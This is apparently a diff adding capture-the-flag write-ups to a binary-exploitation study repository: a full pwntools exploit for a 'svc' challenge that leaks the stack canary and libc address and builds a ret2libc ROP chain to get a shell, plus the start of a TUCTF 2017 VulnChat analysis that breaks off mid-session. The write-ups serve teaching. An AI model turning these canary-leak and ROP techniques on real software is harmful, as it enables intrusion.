+ Breakpoint 1 at 0x400cd3
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/svc/svc
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>1
+ -------------------------
+ [*]SCV IS ALWAYS HUNGRY.....
+ -------------------------
+ [*]GIVE HIM SOME FOOD.......
+ -------------------------
+ >>13371337
+
+ Breakpoint 1, 0x0000000000400cd3 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x9
+ $rbx : 0x0000000000400e40 → push r15
+ $rcx : 0x00007ffff7ce0052 → 0x5677fffff0003d48 ("H="?)
+ $rdx : 0xf8
+ $rsp : 0x00007fffffffde80 → 0x00000001f7f96ee0
+ $rbp : 0x00007fffffffdf40 → 0x0000000000000000
+ $rsi : 0x00007fffffffde90 → "13371337\n\t@"
+ $rdi : 0x0
+ $rip : 0x0000000000400cd3 → mov DWORD PTR [rbp-0xb4], eax
+ $r8 : 0x2
+ $r9 : 0x0000000000602000 → 0x0000000000601e18 → 0x0000000000000001
+ $r10 : 0xfffffffffffffb88
+ $r11 : 0x246
+ $r12 : 0x00000000004009a0 → xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffde80│+0x0000: 0x00000001f7f96ee0 ← $rsp
+ 0x00007fffffffde88│+0x0008: 0x0000000000000001
+ 0x00007fffffffde90│+0x0010: "13371337\n\t@" ← $rsi
+ 0x00007fffffffde98│+0x0018: 0x000000000040090a → add cl, ch
+ 0x00007fffffffdea0│+0x0020: 0x0000000000602080 → 0x0000000000000000
+ 0x00007fffffffdea8│+0x0028: 0x00007ffff7c2fac6 → <__internal_atexit+70> test rax, rax
+ 0x00007fffffffdeb0│+0x0030: 0x0000000000000001
+ 0x00007fffffffdeb8│+0x0038: 0x00007fffffffdef0 → 0x00007fffffffdf00 → 0x0000000000000002
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400cc6 mov rsi, rax
+ 0x400cc9 mov edi, 0x0
+ 0x400cce call 0x400900
+ ●→ 0x400cd3 mov DWORD PTR [rbp-0xb4], eax
+ 0x400cd9 jmp 0x400dc0
+ 0x400cde mov esi, 0x400ec8
+ 0x400ce3 mov edi, 0x6021e0
+ 0x400ce8 call 0x400940 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@plt>
+ 0x400ced mov esi, 0x400980
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "svc", stopped 0x400cd3 in ?? (), reason: BREAKPOINT
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x400cd3 → mov DWORD PTR [rbp-0xb4], eax
+ [#1] 0x7ffff7c17b25 → __libc_start_main()
+ [#2] 0x4009c9 → hlt
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So what we did here is basically to set the breakpoint right after the read() call, then we ran the binary, selected 1 to feed in our data, and gave in the pattern '13371337' Now from here let's find it by using search-pattern:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffde90 - 0x7fffffffde9d → "13371337\n\t@"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdf50:
+ rip = 0x400cd3; saved rip = 0x7ffff7c17b25
+ called by frame at 0x7fffffffe020
+ Arglist at 0x7fffffffde78, args:
+ Locals at 0x7fffffffde78, Previous frame's sp is 0x7fffffffdf50
+ Saved registers:
+ rbp at 0x7fffffffdf40, rip at 0x7fffffffdf48
+
+
+
+Now here we see the memory address of our input at **0x7fffffffde90** and the memory address of the return address at **0x7fffffffdf48** and we calculate the offset as usual:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffde90 - 0x7fffffffdf48 )
+ '-0xb8'
+
+
+
+Now we know that there is a 0xb8 offset between our input text and the return address
+
+So let's summarize everything we got so far:
+
+We have a buffer overflow bug that we can use because of a gets() call and we can get to the return address with it. However the first mitigation we will need to overcome is the stack canary. The stack canary is an eight byte random integer (we saw that it was 4 bytes for x86 systems in the previous challenge [feed](feed.html))
+
+However, before the return address is executed, it checks to see if the stack canary has the same value. If it doesn't the program will end. To bypass this, we need to leak the stack canary. That way we can just overwrite the stack canary with itself, so it will pass the stack cnary to check and execute the return address, which we will overwrite with our buffer overflow
+
+We will leak the stack canary thanks to the following **puts()** call that is being used in the second option:
+
+
+ if (local_c4 == 2) {
+
+ [...]
+
+ puts(local_b8);
+ }
+
+
+it is going to print data that it is given by a pointer until it reaches a null byte. With stack canaries the least significant byte is a null byte. SO we will just send enough data to just overflow the LSB of the stack canary, and then print our input. This will print all of our data and the highest seven eight bytes of the stack canary, and since the lowest byte will always be a nullbyte, we know the full stack canary. With this we can just execute the buffer overflow again and write over the stack canary itself in order to defeat this mitigation.
+
+To leak the stack canary we will need to send **0xa9** bytes of data, the first **0xa8** will be to fill up the input char array, and the last byte will be to overwrite the LSB of the stack canary. So let's take a look at the memory in more detail since we know that our input starts at **0x7fffffffde90** :
+
+
+ gef➤ x/24g 0x7fffffffde90
+ 0x7fffffffde90: 0x3733333137333331 0x40090a
+ 0x7fffffffdea0: 0x602080 0x7ffff7c2fac6
+ 0x7fffffffdeb0: 0x1 0x7fffffffdef0
+ 0x7fffffffdec0: 0x601df8 0x7fffffffe048
+ 0x7fffffffded0: 0x7fffffffe038 0x400e1b
+ 0x7fffffffdee0: 0x11bf 0x10000ffff
+ 0x7fffffffdef0: 0x7fffffffdf00 0x400e31
+ 0x7fffffffdf00: 0x2 0x400e8d
+ 0x7fffffffdf10: 0x0 0x400e40
+ 0x7fffffffdf20: 0x0 0x4009a0
+ 0x7fffffffdf30: 0x7fffffffe030 0x6a77910e1ec4300
+ 0x7fffffffdf40: 0x0 0x7ffff7c17b25
+
+
+
+Here we see that our payload begins at 0x7fffffffde90 since there are only 1s 3s and 7s, although i'm not sure as to what it has been formatted to, we see that **0xa8** bytes down the stack the stack canary **0x6a77910e1ec4300** at **0x7fffffffdf38**
+
+The next step is to defeat the ASLR. ASLR is a mitigation that randomizes the addresses sections of memory. This way when we run the program, we don't actually know where various things in memory are. While the addresses are randomized, the spacing between things are not. For instance the libc (where all the standard functions lik eputs, printf, fgets are stored most of the time) the address of **puts** and **system** will be different everytime we run the program. However the offset between them will remain the same. SO if we leak the address of **puts** we will also leak the address of **system** if we know the offset between the 2. This will allow us to break ASLR in the region where we know one memory and the offset to the next. So let's take a look at the vmmap inside of gdb while we run the binary:
+
+
+ gef➤ vmmap
+ [ Legend: Code | Heap | Stack ]
+ Start End Offset Perm Path
+ 0x0000000000400000 0x0000000000402000 0x0000000000000000 r-x /home/nothing/binexp/2/svc/svc
+ 0x0000000000601000 0x0000000000602000 0x0000000000001000 r-- /home/nothing/binexp/2/svc/svc
+ 0x0000000000602000 0x0000000000603000 0x0000000000002000 rw- /home/nothing/binexp/2/svc/svc
+ 0x0000000000603000 0x0000000000624000 0x0000000000000000 rw- [heap]
+ 0x00007ffff7a8d000 0x00007ffff7a91000 0x0000000000000000 rw-
+ 0x00007ffff7a91000 0x00007ffff7a94000 0x0000000000000000 r-- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7a94000 0x00007ffff7aa5000 0x0000000000003000 r-x /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aa5000 0x00007ffff7aa9000 0x0000000000014000 r-- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aa9000 0x00007ffff7aaa000 0x0000000000017000 r-- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aaa000 0x00007ffff7aab000 0x0000000000018000 rw- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aab000 0x00007ffff7aba000 0x0000000000000000 r-- /usr/lib/libm-2.33.so
+ 0x00007ffff7aba000 0x00007ffff7b55000 0x000000000000f000 r-x /usr/lib/libm-2.33.so
+ 0x00007ffff7b55000 0x00007ffff7bed000 0x00000000000aa000 r-- /usr/lib/libm-2.33.so
+ 0x00007ffff7bed000 0x00007ffff7bee000 0x0000000000142000 --- /usr/lib/libm-2.33.so
+ 0x00007ffff7bee000 0x00007ffff7bef000 0x0000000000142000 r-- /usr/lib/libm-2.33.so
+
+ 0x00007ffff7bef000 0x00007ffff7bf0000 0x0000000000143000 rw- /usr/lib/libm-2.33.so
+ 0x00007ffff7bf0000 0x00007ffff7c16000 0x0000000000000000 r-- /usr/lib/libc-2.33.so
+ 0x00007ffff7c16000 0x00007ffff7d62000 0x0000000000026000 r-x /usr/lib/libc-2.33.so
+ 0x00007ffff7d62000 0x00007ffff7dae000 0x0000000000172000 r-- /usr/lib/libc-2.33.so
+ 0x00007ffff7dae000 0x00007ffff7db1000 0x00000000001bd000 r-- /usr/lib/libc-2.33.so
+ 0x00007ffff7db1000 0x00007ffff7db4000 0x00000000001c0000 rw- /usr/lib/libc-2.33.so
+ 0x00007ffff7db4000 0x00007ffff7dbd000 0x0000000000000000 rw-
+
+ 0x00007ffff7dbd000 0x00007ffff7e53000 0x0000000000000000 r-- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7e53000 0x00007ffff7f3f000 0x0000000000096000 r-x /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f3f000 0x00007ffff7f88000 0x0000000000182000 r-- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f88000 0x00007ffff7f89000 0x00000000001cb000 --- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f89000 0x00007ffff7f96000 0x00000000001cb000 r-- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f96000 0x00007ffff7f97000 0x00000000001d8000 rw- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f97000 0x00007ffff7f9c000 0x0000000000000000 rw-
+ 0x00007ffff7fc6000 0x00007ffff7fca000 0x0000000000000000 r-- [vvar]
+ 0x00007ffff7fca000 0x00007ffff7fcc000 0x0000000000000000 r-x [vdso]
+ 0x00007ffff7fcc000 0x00007ffff7fcd000 0x0000000000000000 r-- /usr/lib/ld-2.33.so
+ 0x00007ffff7fcd000 0x00007ffff7ff1000 0x0000000000001000 r-x /usr/lib/ld-2.33.so
+ 0x00007ffff7ff1000 0x00007ffff7ffa000 0x0000000000025000 r-- /usr/lib/ld-2.33.so
+ 0x00007ffff7ffb000 0x00007ffff7ffd000 0x000000000002e000 r-- /usr/lib/ld-2.33.so
+ 0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000030000 rw- /usr/lib/ld-2.33.so
+ 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
+ 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
+
+
+
+Here we want to break ASLR in the **libc-2.23.so** region where we have read and write permissions, therefore at **00007ffff7bf0000**.
+
+To do the puts function infoleak, we will need 3 things. The plt address of **puts** (address of the imported function which we will use to call it), the address of the got entry of **puts** which holds the libc address, and a **rop gadget** to pop the got entry into the rdi register, and then return.
+
+Since the puts call expects it's input (a single char pointer) in the rdi register, that is where we need to place it. To find the **plt** and **got** addresses, we can use pwntools:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/svc]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> from pwn import *
+ >>> elf = ELF('svc')
+ [*] '/home/nothing/binexp/2/svc/svc'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+ >>> print("plt addr:" + hex(elf.symbols['puts']))
+ plt addr:0x4008d0
+ >>> print("got addr:" + hex(elf.got['puts']))
+ got addr:0x602018
+
+
+
+To find the gadget we need, let's use [ROPGadget](https://github.com/JonathanSalwan/ROPgadget) like we used in the previous challenges already
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/svc]
+ → ROPgadget --binary svc| grep "pop rdi"
+ 0x0000000000400ea3 : pop rdi ; ret
+
+
+
+The last mitigation we will overcome is the NX (Non executable stack), this means that the stack does not have the execute permission. SO we cannot execute code on the stack. Our method to bypass this will have to be a mix of a ROP chain, and a ret2libc (return to libc) attack. ROP is when we take bits of code that already are in the binary and make them work together in the manner that we want.
+
+What we need here is to use ROP Gadgets, which are essentially pointers to the bits of code that end in a **ret** instruction which will make it move to the next gadget. Since these are all valid instruction pointers to code that should run, it will be markeed as executable regardless of the NX.
+
+
+ gef➤ p puts
+ $1 = {<****text variable, no debug info>} 0x7ffff7c66cd0
+ gef➤ p system
+ $2 = {<****text variable, no debug info>} 0x7ffff7c3a120
+ gef➤ search-pattern /bin/sh
+ [+] Searching '/bin/sh' in memory
+ [+] In '/usr/lib/libc-2.33.so'(0x7ffff7d62000-0x7ffff7dae000), permission=r--
+ 0x7ffff7d7c966 - 0x7ffff7d7c96d → "/bin/sh"
+
+
+
+We calculate the offsets:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7ffff7c66cd0 - 0x00007ffff7d62000 )
+ '-0xfb330'
+ >>> hex( 0x7ffff7c3a120 - 0x00007ffff7d62000 )
+ '-0x127ee0'
+ >>> hex( 0x7ffff7d7c966 - 0x00007ffff7d62000 )
+ '0x1a966'
+
+
+
+and with this we can create the exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process("./svc")
+ gdb.attach(target)
+
+ elf = ELF('svc')
+
+
+ # 0x0000000000400ea3 : pop rdi ; ret
+ popRdi = p64(0x400ea3)
+
+ gotPuts = p64(0x602018)
+ pltPuts = p64(0x4008cc)
+
+ offsetPuts = 0xfb330
+ offsetSystem = 0x127ee0
+ offsetBinsh = 0x1a966
+
+ startMain = p64(0x400a96)
+
+ # Establish fucntions to handle I/O with the target
+ def feed(data):
+ print(target.recvuntil(">>"))
+ target.sendline(b'1')
+ print(target.recvuntil(">>"))
+ target.send(data)
+
+ def review():
+ print(target.recvuntil(">>"))
+ target.sendline(b'2')
+ #print target.recvuntil("[*]PLEASE TREAT HIM WELL.....\n-------------------------\n")
+ #leak = target.recvuntil("-------------------------").replace("-------------------------", "")
+ print(target.recvuntil(b"0"*0xa9))
+ canaryLeak = target.recv(7)
+ canary = u64(b"\x00" + canaryLeak)
+ print("canary is: " + hex(canary))
+ return canary
+
+ def leave():
+ print(target.recvuntil(">>"))
+ target.sendline(b"3")
+
+ # Start of with the canary leak. We will overflow the buffer write up to the stack canary, and overwrite the least signifcant byte of the canary
+ leakCanary = b""
+ leakCanary += b"0"*0xa8 # Fill up space up to the canary
+ leakCanary += b"0" # Overwrite least significant byte of the canary
+
+
+
+ feed(leakCanary) # Execute the overwrite
+
+ canary = review() # Leak the canary, and parse it out
+
+ # Start the rop chain to give us a libc infoleak
+ leakLibc = b""
+ leakLibc += b"0"*0xa8 # Fill up space up to the canary
+ leakLibc += p64(canary) # Overwrite the stack canary with itself
+ leakLibc += b"1"*0x8 # 8 more bytes until the return address
+ leakLibc += popRdi # Pop got entry for puts in rdi register
+ leakLibc += gotPuts # GOT address of puts
+ leakLibc += pltPuts # PLT address of puts
+ leakLibc += startMain # Loop back around to the start of main
+
+ # Send the payload to leak libc
+ feed(leakLibc)
+
+ # Return to execute our code
+ leave()
+
+ # Scan in and parse out the infoleak
+
+ print(target.recvuntil("[*]BYE ~ TIME TO MINE MIENRALS...\x0a"))
+
+ putsLeak = target.recvline().replace(b"\x0a", b"")
+
+ putsLibc = u64(putsLeak + b"\x00"*(8-len(putsLeak)))
+
+ # Calculate the needed addresses
+
+ libcBase = putsLibc - offsetPuts
+ systemLibc = libcBase + offsetSystem
+ binshLibc = libcBase + offsetBinsh
+
+ print("libc base: " + hex(libcBase))
+
+ # Form the payload to return to system
+
+ payload = b""
+ payload += b"0"*0xa8
+ payload += p64(canary)
+ payload += b"1"*0x8
+ payload += popRdi # Pop "/bin/sh" into the rdi register, where it expects it's argument (single char pointer)
+ payload += p64(binshLibc) # Address to '/bin/sh'
+ payload += p64(systemLibc) # Libc address of system
+
+ # Send the final payload
+ feed(payload)
+
+ target.sendline(b"3")
+
+ #feed(payload)
+
+ # Return to execute our code, return to system and get a shell
+ #leave()
+
+ target.interactive()
+
+
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/vuln.md b/2/vuln.md
new file mode 100644
index 0000000..5ea1ecd
--- /dev/null
+++ b/2/vuln.md
@@ -0,0 +1,421 @@
+# TUCTF 2017 VulnChat
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat
+ --2021-03-01 09:42:07-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat [following]
+ --2021-03-01 09:42:08-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 6092 (5.9K) [application/octet-stream]
+ Saving to: ‘vuln-chat’
+
+ vuln-chat 100%[================================================================>] 5.95K --.-KB/s in 0s
+
+ 2021-03-01 09:42:08 (30.0 MB/s) - ‘vuln-chat’ saved [6092/6092]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → file vuln-chat
+ vuln-chat: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a3caa1805eeeee1454ee76287be398b12b5fa2b7, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → chmod +x vuln-chat
+
+
+
+` ![]()
+
+## Solution
+
+First step is to execute the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → ./vuln-chat
+ ----------- Welcome to vuln-chat -------------
+ Enter your username: nothing
+ Welcome nothing!
+ Connecting to 'djinn'
+ --- 'djinn' has joined your chat ---
+ djinn: I have the information. But how do I know I can trust you?
+ nothing: you can't lol
+ djinn: Sorry. That's not good enough
+
+
+
+Let's inspect it in ghidra:
+
+
+
+Which gives us the following code:
+
+
+ undefined4 main(void)
+
+ {
+ undefined local_31 [20];
+ undefined local_1d [20];
+ undefined4 local_9;
+ undefined local_5;
+
+ setvbuf(stdout,(char *)0x0,2,0x14);
+ puts("----------- Welcome to vuln-chat -------------");
+ printf("Enter your username: ");
+ local_9 = 0x73303325;
+ local_5 = 0;
+ __isoc99_scanf(&local;_9,local_1d);
+ printf("Welcome %s!\n",local_1d);
+ puts("Connecting to \'djinn\'");
+ sleep(1);
+ puts("--- \'djinn\' has joined your chat ---");
+ puts("djinn: I have the information. But how do I know I can trust you?");
+ printf("%s: ",local_1d);
+ __isoc99_scanf(&local;_9,local_31);
+ puts("djinn: Sorry. That\'s not good enough");
+ fflush(stdout);
+ return 0;
+ }
+
+
+
+Here we see that first we get asked for our username, and then our input text gets put into local_1d (20 bytes) and then there is another scanf which puts our input text into local_31 (20 bytes aswell). For both scanf there is another variable being used called '&local;_9' this is a format specifier whcich is stored on the stack:
+
+
+
+
+ 080485be c7 45 fb MOV dword ptr [EBP + local_9],0x73303325
+ 25 33 30 73
+
+
+
+here we see that an address is being called '0x73303325', and to see what it is we can just click on it and wait for ghidra to show us what it is:
+
+
+
+
+ s03%
+
+
+
+since we are dealing with a 32bit LSB executable, this is written in little endian (reverse or least important byte first) we get the following:
+
+
+ %30s
+
+
+so now we know that both scanf functions take our input characters with '%30s' or '30 characters'. So let's take a look at the stack layout from ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined1 Stack[-0x5]:1 local_5 XREF[1]: 080485c5(W)
+ undefined4 Stack[-0x9]:4 local_9 XREF[3]: 080485be(W),
+ 080485cd(*),
+ 08048630(*)
+ undefined1 Stack[-0x1d]:1 local_1d XREF[3]: 080485c9(*),
+ 080485d9(*),
+ 0804861b(*)
+ undefined1 Stack[-0x31]:1 local_31 XREF[1]: 0804862c(*)
+ main XREF[4]: Entry Point(*),
+ _start:08048487(*), 08048830,
+ 080488ac(*)
+ 0804858a 55 PUSH EBP
+
+
+
+Now the second time we are prompted for text, the text gets stored into local_31 located at -0x31, the first time we get prompted for text, the text gets stored in local_1d at -0x1d. Therefore local_31 can hold 0x31 - 0x1d bytes:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [~]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0x31 - 0x1d)
+ '0x14'
+
+
+now that we know that local_31 can hold 14 bytes, let's see how much the local_1d variable hold aswell: 0x1d - 0x9
+
+
+ >>> hex(0x1d - 0x9)
+ '0x14'
+
+
+So both local_31 and local_1d can hold 14 bytes respectively. And since we can scan in 30 bytes of data, that gives us 16 bytes to overflow with (or 0x10 bytes)
+
+The idea here is to first overflow with local_1d to overflow to the value of local_9 (where the %30s is written in little endian as we saw earlier). Then we will be able to specify how much data the second scanf call will scan. And with that we will be able to scan in more than enough data to overwrite the saved return address to get code execution when the ret instruction executes. Now let's check if there is a flag function in ghidra:
+
+
+
+
+ void printFlag(void)
+
+ {
+ system("/bin/cat ./flag.txt");
+ puts("Use it wisely");
+ return;
+ }
+
+
+Now with all of that, let's look at how the memory is corrupted during the exploit. First we set a breakpoint right after the second scanf call at '0x08048639':
+
+
+ 08048634 e8 27 fe CALL __isoc99_scanf undefined __isoc99_scanf()
+ ff ff
+ 08048639 83 c4 08 ADD ESP,0x8
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/vulnchat]
+ → gdb ./vuln-chat
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./vuln-chat...
+ (No debugging symbols found in ./vuln-chat)
+ gef➤ b *0x8048639
+ Breakpoint 1 at 0x8048639
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/vulnchat/vuln-chat
+ ----------- Welcome to vuln-chat -------------
+ Enter your username: 321654987
+ Welcome 321654987!
+ Connecting to 'djinn'
+ --- 'djinn' has joined your chat ---
+ djinn: I have the information. But how do I know I can trust you?
+ 321654987: 987654321
+
+ Breakpoint 1, 0x08048639 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0x1
+ $ebx : 0x0
+ $ecx : 0xffffd090 → 0xf7f90540 → 0xfbad2288
+ $edx : 0xf7f8fe1c → 0x001eed2c
+ $esp : 0xffffd0b0 → 0xffffd0e3 → "%30s"
+ $ebp : 0xffffd0e8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x08048470 → <_start+0> xor ebp, ebp
+ $eip : 0x08048639 → add esp, 0x8
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd0b0│+0x0000: 0xffffd0e3 → "%30s" ← $esp
+ 0xffffd0b4│+0x0004: 0xffffd0bb → "987654321"
+ 0xffffd0b8│+0x0008: 0x39049a10
+ 0xffffd0bc│+0x000c: "87654321"
+ 0xffffd0c0│+0x0010: "4321"
+ 0xffffd0c4│+0x0014: 0xffffd100 → 0xffffd134 → 0x67db6985
+ 0xffffd0c8│+0x0018: 0xffffd19c → 0xffffd371 → "ALACRITTY_LOG=/tmp/Alacritty-3896966.log"
+ 0xffffd0cc│+0x001c: 0x31dd8c99
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x8048630 lea eax, [ebp-0x5]
+ 0x8048633 push eax
+ 0x8048634 call 0x8048460 <__isoc99_scanf@plt>
+ ●→ 0x8048639 add esp, 0x8
+ 0x804863c push 0x80487ec
+ 0x8048641 call 0x8048410
+ 0x8048646 add esp, 0x4
+ 0x8048649 mov eax, ds:0x8049a60
+ 0x804864e push eax
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "vuln-chat", stopped 0x8048639 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x8048639 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+now from here we first set the breakpoint, then ran the binary, then entered the first scanf where we put the '321654987' pattern, and then entered the second scanf where we put the '987654321' pattern, and then we hit the breakpoint we set. Now we want to inspect what happened to our second text input, the pattern '987654321' so we search the pattern in the memory:
+
+
+ gef➤ search-pattern 987654321
+ [+] Searching '987654321' in memory
+ [+] In '[heap]'(0x804a000-0x806c000), permission=rw-
+ 0x804a1a0 - 0x804a1ab → "987654321\n"
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffd0bb - 0xffffd0c4 → "987654321"
+
+
+
+Now we know that our second text input pattern is at **0xffffd0bb** let's search for the pattern '%30s':
+
+
+ gef➤ search-pattern %30s
+ [+] Searching '%30s' in memory
+ [+] In '/home/nothing/binexp/2/vulnchat/vuln-chat'(0x8048000-0x8049000), permission=r-x
+ 0x80485c1 - 0x80485c5 → "%30s[...]"
+ [+] In '/home/nothing/binexp/2/vulnchat/vuln-chat'(0x8049000-0x804a000), permission=rw-
+ 0x80495c1 - 0x80495c5 → "%30s[...]"
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffd0e3 - 0xffffd0e7 → "%30s"
+
+
+
+Now we know that the format string is stored at**0xffffd0e3** so let's see where our first input text is with the pattern 321654987:
+
+
+ gef➤ search-pattern 321654987
+ [+] Searching '321654987' in memory
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffb06c - 0xffffb086 → "321654987: 654987!\nname: "
+ 0xffffd0cf - 0xffffd0d8 → "321654987"
+
+
+
+so now we know that our first text pattern (321654987) is located at **0xffffd0cf** so let's calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/vulnchat]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0xffffd0e3 - 0xffffd0cf )
+ '0x14'
+
+
+
+so now we know that our first input text (321654987) is 0x14 bytes (or 20 bytes) away from the format string variable value '%30s', our second input begins at **0xffffd0bb** , but we need to know where the return address is and what the offset between our second input and the return address is:
+
+
+ gef➤ x/14x 0xffffd0bb
